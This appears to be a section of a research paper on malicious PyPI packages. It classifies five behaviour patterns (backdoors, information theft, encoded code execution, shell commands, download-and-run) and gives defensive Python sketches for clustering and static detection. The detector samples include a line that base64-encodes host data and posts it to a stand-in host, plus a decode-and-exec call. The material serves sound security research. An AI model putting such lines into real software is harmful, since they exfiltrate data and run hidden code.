An Empirical Study of Malicious Code In PyPI Ecosystem

Malicious code behaviors

We propose a clustering method based on API call sequences to analyze and classify malicious code. Our goal is to reveal the behavioral patterns of malware so that malicious code with similar behavioral attributes can be identified more effectively. To this end, we extract from known malicious code the API call sequences that are closely related to malicious behavior. These sequences capture how the malicious code interacts with the operating system or other software modules during execution. By clustering the API call sequences, we can discover behavior shared by different malicious code samples. The clustering yielded five categories of malicious behavior.
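The idea of grouping samples by the similarity of their API call sequences can be illustrated with a minimal sketch. The section does not specify the distance measure or the clustering algorithm used in the study, so the sketch assumes a normalized edit distance and a simple greedy threshold clustering. The function names and the 0.4 threshold are hypothetical choices made for illustration only.

```python
from typing import List, Sequence


def edit_distance(a: Sequence[str], b: Sequence[str]) -> int:
    """Levenshtein distance between two API call sequences."""
    prev = list(range(len(b) + 1))
    for i, x in enumerate(a, start=1):
        curr = [i]
        for j, y in enumerate(b, start=1):
            cost = 0 if x == y else 1
            curr.append(min(prev[j] + 1, curr[j - 1] + 1, prev[j - 1] + cost))
        prev = curr
    return prev[-1]


def normalized_distance(a: Sequence[str], b: Sequence[str]) -> float:
    """Edit distance scaled to [0, 1] by the longer sequence length."""
    longest = max(len(a), len(b))
    return edit_distance(a, b) / longest if longest else 0.0


def cluster_sequences(sequences: List[Sequence[str]],
                      threshold: float = 0.4) -> List[List[int]]:
    """Greedy clustering (an assumption, not the study's algorithm):
    a sequence joins the first cluster that has a member within the threshold,
    otherwise it starts a new cluster. Returns lists of sequence indices."""
    clusters: List[List[int]] = []
    for idx, seq in enumerate(sequences):
        for cluster in clusters:
            if any(normalized_distance(seq, sequences[m]) <= threshold
                   for m in cluster):
                cluster.append(idx)
                break
        else:
            clusters.append([idx])
    return clusters


# Hypothetical API call sequences, as they might be extracted from four samples
SEQUENCES = [
    ["socket.connect", "socket.recv", "base64.b64decode", "os.system"],
    ["socket.connect", "socket.recv", "os.system"],
    ["open", "base64.b64encode", "requests.post"],
    ["open", "platform.node", "base64.b64encode", "requests.post"],
]
print(cluster_sequences(SEQUENCES))
```

With these inputs, the first two sequences differ by a single call and fall into one cluster, and the last two form a second cluster. A production analysis would likely use a library clustering routine and a tuned threshold.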

1: Remote Control

The malicious code first calls a network connection-related API function to establish a connection with a remote server. It then receives an encrypted command from the server, decodes it using decoding-related API functions, and executes it. By establishing a backdoor on a user's system, attackers can achieve persistent remote control and continue to access the system even after the initial attack has been eliminated. This behavior can cause long-term, sustained damage to the system.

Pattern: S -> Cr(IP,Port) -> Cr -> [Ce] -> Cs -> E
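A behavior pattern written in this notation can be checked mechanically against a sequence of call-category symbols. The sketch below is one possible reading of the notation, not the study's tooling: it assumes that square brackets mark optional steps and that arguments in parentheses, such as (IP,Port), can be ignored for matching. The helper names pattern_to_regex and matches are hypothetical.

```python
import re
from typing import List


def pattern_to_regex(pattern: str) -> re.Pattern:
    """Translate 'S -> [Ce] -> E' style notation into a regex over
    space-terminated symbols. Bracketed steps are treated as optional."""
    parts = []
    for step in pattern.split("->"):
        step = step.strip()
        optional = step.startswith("[") and step.endswith("]")
        name = step.strip("[]")
        name = re.sub(r"\(.*\)", "", name).strip()  # drop arguments such as (IP,Port)
        token = re.escape(name) + " "
        parts.append(f"(?:{token})?" if optional else token)
    return re.compile("".join(parts))


def matches(pattern: str, sequence: List[str]) -> bool:
    """True if the symbol sequence is exactly an instance of the pattern."""
    text = "".join(symbol + " " for symbol in sequence)
    return pattern_to_regex(pattern).fullmatch(text) is not None


REMOTE_CONTROL = "S -> Cr(IP,Port) -> Cr -> [Ce] -> Cs -> E"

print(matches(REMOTE_CONTROL, ["S", "Cr", "Cr", "Ce", "Cs", "E"]))
print(matches(REMOTE_CONTROL, ["S", "Cr", "Cr", "Cs", "E"]))
print(matches(REMOTE_CONTROL, ["S", "Cf", "Cn", "E"]))
```

The matcher is strict: the sequence must consist of exactly the steps in the pattern. Traces from real packages contain unrelated calls, so they would need to be reduced to the relevant symbols before matching.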

Code Example

2: Information Stealing

In the data we collected, we found many instances of malicious code that steal sensitive information. Such code collects not only sensitive host information but also data such as passwords and cookies from the user's browser, which can then be used for malicious purposes. This type of malicious behavior can affect multiple systems and users. The attacker first reads sensitive local files using file operation-related API functions, or gathers system information using host information-related API functions. The attacker may then obfuscate this private information, typically with Base64 encoding, and finally calls network connection-related API functions to send it to a specified IP address or URL.

Pattern: S -> [Cf(Path)] -> [Ch] -> [Ce] -> Cn(URL) -> E
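To relate source code to the symbols in this pattern, each API call has to be assigned to a category. The following sketch does this statically with Python's ast module, without executing the analyzed code. The CATEGORY_BY_CALL table is a hypothetical, deliberately tiny mapping chosen for illustration; it is not the API list used in the study, and the sample string exists only to be parsed.

```python
import ast
from typing import Dict, List

# Hypothetical mapping from dotted call names to pattern symbols (illustrative only)
CATEGORY_BY_CALL: Dict[str, str] = {
    "open": "Cf",                    # file operation
    "platform.node": "Ch",           # host information
    "getpass.getuser": "Ch",
    "base64.b64encode": "Ce",        # encoding
    "requests.post": "Cn",           # network connection
    "urllib.request.urlopen": "Cn",
}


def dotted_name(node: ast.AST) -> str:
    """Return 'pkg.mod.func' for simple name/attribute chains, else ''."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = dotted_name(node.value)
        return f"{base}.{node.attr}" if base else ""
    return ""


def call_categories(source: str) -> List[str]:
    """List the category symbols of known calls in source order.
    Source order only approximates execution order."""
    calls = [n for n in ast.walk(ast.parse(source)) if isinstance(n, ast.Call)]
    calls.sort(key=lambda n: (n.lineno, n.col_offset))
    symbols = []
    for call in calls:
        symbol = CATEGORY_BY_CALL.get(dotted_name(call.func))
        if symbol:
            symbols.append(symbol)
    return symbols


# Sample text that is parsed, never executed
SAMPLE = '''
import base64, platform, requests
data = open("/etc/hostname").read()
host = platform.node()
blob = base64.b64encode((data + host).encode())
requests.post("http://example.invalid/collect", data=blob)
'''
print(call_categories(SAMPLE))
```

Name-based matching of this kind is easy to evade through import aliases or dynamic attribute lookups, so it should be read as a first approximation of the extraction step rather than a robust detector.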

Code Example

3: Code Execution

We found that some attackers use dynamic code execution at runtime to circumvent code signatures and other security measures. The malicious payload can take the form of a Base64-encoded string of code that is either downloaded from a remote server or embedded within the package. The attacker first decodes the obfuscated payload using decoding-related API functions, then passes the decoded string to the compile() function, which compiles it into a Python code object. Finally, the attacker passes the code object to code execution-related API functions to execute it and accomplish the attack objective.

Pattern: S -> [Cn(URL)] -> [Ce] -> [Compile] -> Cc -> E
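The decode, compile, execute chain described here leaves a recognizable shape in the syntax tree: an execution call whose arguments contain a decoding call. The sketch below flags that shape with the ast module and never runs the analyzed code. The sets EXEC_CALLS and DECODE_CALLS are illustrative assumptions rather than the study's API lists, and find_decoded_exec is a hypothetical helper name.

```python
import ast
from typing import List

EXEC_CALLS = {"exec", "eval"}  # code execution-related calls (illustrative)
DECODE_CALLS = {"b64decode", "a85decode", "unhexlify", "decompress"}  # illustrative


def call_name(call: ast.Call) -> str:
    """Return the last component of the called name, e.g. 'b64decode'."""
    func = call.func
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        return func.attr
    return ""


def find_decoded_exec(source: str) -> List[int]:
    """Line numbers of exec/eval calls whose arguments contain a decode call."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call) and call_name(node) in EXEC_CALLS:
            inner = (n for arg in node.args for n in ast.walk(arg))
            if any(isinstance(n, ast.Call) and call_name(n) in DECODE_CALLS
                   for n in inner):
                hits.append(node.lineno)
    return sorted(hits)


# Sample text that is parsed, never executed
SAMPLE = (
    "import base64\n"
    "exec(compile(base64.b64decode(blob), '<s>', 'exec'))\n"
    "print(eval('1 + 1'))\n"
)
print(find_decoded_exec(SAMPLE))
```

Only the nested form is detected. If the decoded value is first stored in a variable and executed later, a data-flow analysis would be needed to connect the two steps.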

Code Example

4: Command Execution

Attackers use command execution-related API functions to execute malicious PowerShell or other shell commands that run further malicious programs, delete files, steal sensitive information, and so on. The attacker may also use network connection-related API functions to send the collected information to a remote server. This attack can give the attacker complete control of the system, resulting in serious data leakage and corruption.

Pattern: S -> [Ce] -> Cs -> [Ce] -> [Cn(URL)] -> E
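For review purposes, it helps to list every place where a package hands a command to the shell, together with the command text when it is a plain string literal. The sketch below does this statically. The COMMAND_CALLS set is an illustrative assumption covering a few standard-library entry points, and command_call_sites is a hypothetical helper name. A literal of None indicates that the command is built at runtime, which is consistent with the optional decoding step in the pattern.

```python
import ast
from typing import List, Optional, Tuple

# Standard-library entry points that run external commands (illustrative subset)
COMMAND_CALLS = {
    "os.system", "os.popen",
    "subprocess.run", "subprocess.call",
    "subprocess.Popen", "subprocess.check_output",
}


def qualified_name(node: ast.AST) -> str:
    """Return 'module.func' for simple name/attribute chains, else ''."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = qualified_name(node.value)
        return f"{base}.{node.attr}" if base else ""
    return ""


def command_call_sites(source: str) -> List[Tuple[int, str, Optional[str]]]:
    """Return (line, call name, literal command or None) for each command call."""
    sites = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = qualified_name(node.func)
            if name in COMMAND_CALLS:
                first = node.args[0] if node.args else None
                is_literal = (isinstance(first, ast.Constant)
                              and isinstance(first.value, str))
                sites.append((node.lineno, name, first.value if is_literal else None))
    return sorted(sites, key=lambda site: site[0])


# Sample text that is parsed, never executed
SAMPLE = (
    "import os, subprocess\n"
    "os.system('whoami')\n"
    "subprocess.run(cmd, shell=True)\n"
)
for site in command_call_sites(SAMPLE):
    print(site)
```

Calls reached through aliases such as `from os import system` are not resolved by this sketch and would require import tracking.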

Code Example

5: Unauthorised File Operation

The attacker uses malicious Python code to connect to a remote server and download malicious executable files via remote connection-related API functions. These executables are then run on the local system by calling command execution-related API functions. They may be various types of malware, such as Trojans, ransomware, or password-stealing software. Finally, the attacker calls file operation-related API functions to delete the executables and erase the traces of the attack.

Pattern: S -> [Cn(URL)] -> Cf -> Cs -> [Cf] -> E

Code Example